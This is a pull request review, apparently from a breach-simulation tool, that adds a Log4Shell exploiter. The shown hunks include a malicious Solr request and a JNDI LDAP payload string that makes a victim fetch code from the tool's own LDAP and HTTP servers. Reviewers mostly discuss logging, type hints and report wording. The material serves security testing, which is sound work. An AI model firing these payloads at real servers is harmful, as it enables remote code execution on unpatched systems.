### PR TITLE
Log4Shell exploiter

### LINKED ISSUE #1663: Add log4j exploiter
Add an exploiter to exploit the new log4j vulnerabilities.

- [x] Identify all related CVEs, choose which ones we'll exploit and which we'll ignore.
- [x] Add test machines in GCP - some windows, some linux, multiple vulnerable application
- [x] Simple POC that allows one agent to remotely launch another agent on the victim and know whether or not exploitation was successful
- [x] Implement a new exploiter
- [x] Add blackbox tests - @ilija-lazoroski @VakarisZ 
- [x] Add documentation - @shreyamalviya 
- [x] "Adapter was already registered" error - @mssalvatore 
- [x] Code review - @shreyamalviya 
- [x] Investigate if monkey agent freezes on victim machines
- [x] Re-generate logstash and tomcat images @ilija-lazoroski 
   - [x] Logstash
   - [x] Tomcat 
- [x] Recompile Linux and Windows java class templates from source (ensure they don't contain anything malicious) - @mssalvatore/ / @VakarisZ

### PR DESCRIPTION
**Pull request by shreyamalviya**
# What does this PR do? 

Fixes #1663

## PR Checklist
* [ ] Have you added an explanation of what your changes do and why you'd like to include them?
* [ ] Is the TravisCI build passing? 
* [ ] Was the CHANGELOG.md updated to reflect the changes?
* [ ] Was the documentation framework updated to reflect the changes?

## Testing Checklist

* [ ] Added relevant unit tests?
* [ ] Have you successfully tested your changes locally? Elaborate:
    > Tested by {Running the Monkey locally with relevant config/running Island/...} 
* [ ] If applicable, add screenshots or log transcripts of the feature working

## Explain Changes

Are the commit messages enough? If not, elaborate.

### CODE REVIEW

File: monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py [hunk 1]
```diff
@@ -0,0 +1,22 @@
...
+class SolrExploit(IServiceExploiter):
+    service_name = "Apache Solr"
+
+    @staticmethod
+    def trigger_exploit(payload: str, host: VictimHost, port: int):
+        url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
+        try:
+            logger.debug("Sending malicious SOLR log4j request")
+            requests.post(url, timeout=5, verify=False)  # noqa DUO123
+            logger.debug("Request sent")
```
Comment (shreyamalviya) [inline monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py:20]: The other two services don't have these log statements. Let's add them there or remove them here, for consistency.

File: monkey/infection_monkey/exploit/web_rce.py [hunk 2]
```diff
@@ -154,21 +155,23 @@ def exploit(self, url, command):
         """
         raise NotImplementedError()
 
-    def get_open_service_ports(self, port_list, names):
+    @staticmethod
+    def get_open_service_ports(victim_host: VictimHost, port_list, names):  # noqa: F821
```
Comment (shreyamalviya) [inline monkey/infection_monkey/exploit/web_rce.py:159]: If this is being modified anyway, might as well add type hints for other arguments and the return value as well.

File: monkey/infection_monkey/exploit/web_rce.py [hunk 3]
```diff
@@ -216,10 +219,12 @@ def check_if_exploitable(self, url):
             logger.error("Host's exploitability check failed due to: %s" % e)
             return False
 
-    def build_potential_urls(self, ports, extensions=None):
+    @staticmethod
+    def build_potential_urls(ip: str, ports, extensions=None):
```
Comment (shreyamalviya) [inline monkey/infection_monkey/exploit/web_rce.py:223]: Same as above

File: monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py [hunk 4]
```diff
@@ -52,6 +55,7 @@ class ExploiterDescriptorEnum(Enum):
     POWERSHELL = ExploiterDescriptor(
         "PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
     )
+    LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
```
Comment (shreyamalviya) [inline monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:58]:
```suggestion
    LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
```

File: monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js [hunk 5]
```diff
@@ -0,0 +1,21 @@
+import React from 'react';
+import CollapsibleWellComponent from '../CollapsibleWell';
+
+export function log4shellIssueOverview() {
+  return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>)
```
Comment (shreyamalviya) [inline monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js:5]:
```suggestion
  return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
```

File: monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js [hunk 6]
```diff
@@ -0,0 +1,21 @@
...
+}
+
+export function log4shellIssueReport(issue) {
+  return (
+      <>
+        Upgrade the log4j component to version 2.15.0 or later.
```
Comment (shreyamalviya) [inline monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js:11]:
```suggestion
        Upgrade the Apache Log4j component to version 2.15.0 or later.
```

File: monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js [hunk 7]
```diff
@@ -0,0 +1,21 @@
...
+        <CollapsibleWellComponent>
+          The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
+          className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
+          className="badge badge-danger">log4shell remote code execution</span> attack.
```
Comment (shreyamalviya) [inline monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js:15]:
```suggestion
          className="badge badge-danger">the Log4Shell remote code execution</span> attack.
```

File: monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js [hunk 8]
```diff
@@ -0,0 +1,21 @@
...
+          <br/>
+          The attack was made possible due to an old version of log4j component.
```
Comment (shreyamalviya) [inline monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js:17]:
```suggestion
          The attack was made possible due to an old version of the Apache Log4j component.
```

File: vulture_allowlist.py [hunk 9]
```diff
@@ -3,7 +3,11 @@
 dead or is kept deliberately. Referencing these in a file like this makes sure that
 Vulture doesn't mark these as dead again.
 """
+from infection_monkey.exploit.log4shell_utils.ldap_server import LDAPServerFactory
 from monkey_island.cc.models import Report
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import (
+    ExploiterDescriptorEnum,
+)
```
Comment (shreyamalviya) [inline vulture_allowlist.py:10]: Not needed

File: monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py (hunk 1 above)
Comment (ilija-lazoroski) [reply monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py]: I think it is best to remove it.

File: monkey/infection_monkey/exploit/log4shell.py [hunk 10]
```diff
@@ -0,0 +1,172 @@
...
+
+logger = logging.getLogger(__name__)
+
+
+class Log4ShellExploiter(WebRCE):
+    _TARGET_OS_TYPE = ["linux", "windows"]
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+    _EXPLOITED_SERVICE = "Log4j"
+    DOWNLOAD_TIMEOUT = 15
+    REQUEST_TO_VICTIM_TIME = 5  # How long the request from victim to monkey might take. In seconds
```
[the remark this answers is not in the document]
Comment (VakarisZ) [reply monkey/infection_monkey/exploit/log4shell.py:36]: Yes, comment should say "response"

File: monkey/infection_monkey/exploit/log4shell.py [hunk 11]
```diff
@@ -0,0 +1,172 @@
...
+            http_server_port=self.class_http_server_port,
+            storage_dir=get_monkey_dir_path(),
+        )
+
+        self._ldap_server.run()
+
+    def _stop_servers(self):
+        logger.debug("Stopping all LDAP and HTTP Servers")
+        self._agent_http_server_thread.stop()
+        self._agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
```
[the remark this answers is not in the document]
Comment (VakarisZ) [reply monkey/infection_monkey/exploit/log4shell.py:108]: good catch

File: monkey/infection_monkey/exploit/log4shell.py [hunk 12]
```diff
@@ -0,0 +1,172 @@
...
+        self._exploit_class_http_server.stop()
+        self._exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+
+        self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+
+    def _build_ldap_payload(self):
+        interface_ip = get_interface_to_target(self.host.ip_addr)
+        return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
+
+    # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
```
[the remark this answers is not in the document]
Comment (VakarisZ) [reply monkey/infection_monkey/exploit/log4shell.py:119]: Don't know when. I just wanted to note that there's potential to reduce duplication. But I guess it's not important enough for now, I'll remove the comment

**Review by mssalvatore — APPROVED** [review]

**Pull request merged**